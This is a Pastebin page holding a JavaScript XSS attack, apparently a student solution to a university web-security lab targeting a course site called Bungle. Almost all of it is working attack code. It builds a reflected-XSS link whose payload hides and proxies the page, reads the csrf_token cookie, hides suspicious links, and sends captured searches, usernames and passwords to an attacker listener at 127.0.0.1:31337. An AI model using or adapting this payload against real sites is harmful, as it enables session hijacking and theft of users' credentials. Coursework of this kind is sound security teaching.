Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(attacker) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- $("html").load(href, function(){
- $("html").show();
- if (href.includes("search?")){
- for(var i=0; i<document.getElementsByTagName('a').length;i++){
- if (document.getElementsByTagName('a')[i].href.includes('script')){
- document.getElementsByTagName('a')[i].style.display='none';}}
- }
- var x= encodeURIComponent(document.cookie);var y= x.split('%3B%20');
- for(var i=0; i<y.length; i++){if(y[i].split('%3D')[0]=='csrf_token')
- {
- var token_cookie=y[i].split('%3D')[1];
- }
- }
- var token= encodeURIComponent(token_cookie);
- var attacker = "http://127.0.0.1:31337/";
- $.get(attacker, "The csrf_token: "+token);
- history.pushState(null, null, href);
- var old=window.location.href;
- window.onpopstate = function(event) {if(old!=window.location.href){proxy(window.location.href)}}
- function home(){
- $.get(attacker, "The user is going to home");
- proxy("./");
- }
- function search(){
- var q=document.getElementById('query').value;
- $.get(attacker, "The user is searching: "+q);
- proxy("./search?q="+q);
- }
- function login(){
- var username=document.getElementById('username').value;
- var password=document.getElementById('userpass').value;
- $.ajax({
- type: 'POST',
- url: 'http://cs558web.bu.edu/project2/login',
- crossDomain: true,
- data: {csrf_token:token,username: username, password: password },
- cache: false,
- success: function(data) {
- }
- });
- $.get(attacker, "The user is logged in with username: "+username+"and password: "+password);
- proxy("./");
- }
- function logout(){
- $.get(attacker, "The user is loging out");
- $.ajax({
- type: 'POST',
- url: 'http://cs558web.bu.edu/project2/logout',
- crossDomain: true,
- data: {csrf_token:token},
- cache: false,
- success: function(data) {
- proxy("./");
- }
- });
- }
- function create(){
- var username=document.getElementById('username').value;
- var password=document.getElementById('userpass').value;
- $.post('http://cs558web.bu.edu/project2/create', { username: username, password: password } );
- $.get(attacker, "The user is creating a user with username: "+username+"and password: "+password);
- proxy("./");
- }
- if (href.includes("search?")==false){
- if(document.getElementById('log-out-btn')==null){
- document.getElementsByTagName('form')[2].replaceWith('');
- document.getElementsByTagName('div')[12].innerHTML='<span class="form-inline"><p>Log in or create an account.</p><div class="form-group form-space"><input id="username" name="username" type="text" placeholder="Username" required class="form-control"></div><div class="form-group form-space"><input id="userpass" name="password" type="password" placeholder="Password" required class="form-control"></div><div class="form-group form-more-space"><button id="log-in-btn" class="btn btn-default">Login</button><button id="new-account-btn" class="btn btn-default">Create Account</button></div></span>'
- }
- }
- if(document.getElementById('search-again-btn')!=null){
- document.getElementById('search-again-btn').removeAttribute('href');
- document.getElementById('search-again-btn').addEventListener('click', function() {home();}); }
- if(document.getElementById('bungle-lnk')!=null){
- document.getElementById('bungle-lnk').removeAttribute('href');
- document.getElementById('bungle-lnk').addEventListener('click', function() {home();})}
- if(document.getElementById('log-out-btn')!=null){
- document.getElementById('log-out-btn').type = '#';
- document.getElementById('log-out-btn').addEventListener('click', function() {logout();});}
- if(document.getElementById('search-btn')!=null){
- document.getElementById('search-btn').type = '#';
- document.getElementById('search-btn').addEventListener('click', function() {search();});}
- if(document.getElementById('log-in-btn')!=null){
- document.getElementById('log-in-btn').addEventListener('click', function() {login();});}
- if(document.getElementById('new-account-btn')!=null){
- document.getElementById('new-account-btn').addEventListener('click', function() {create();});
- }
- });
- }
- $("html").hide();
- proxy("./");
- }
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- } else {
- // Implement code to defeat XSS defenses here.
- }
- }
- var xssdefense = 0;
- var target = "http://cs558web.bu.edu/project2/";
- var attacker = "http://127.0.0.1:31337/";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script> <h3></h3>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement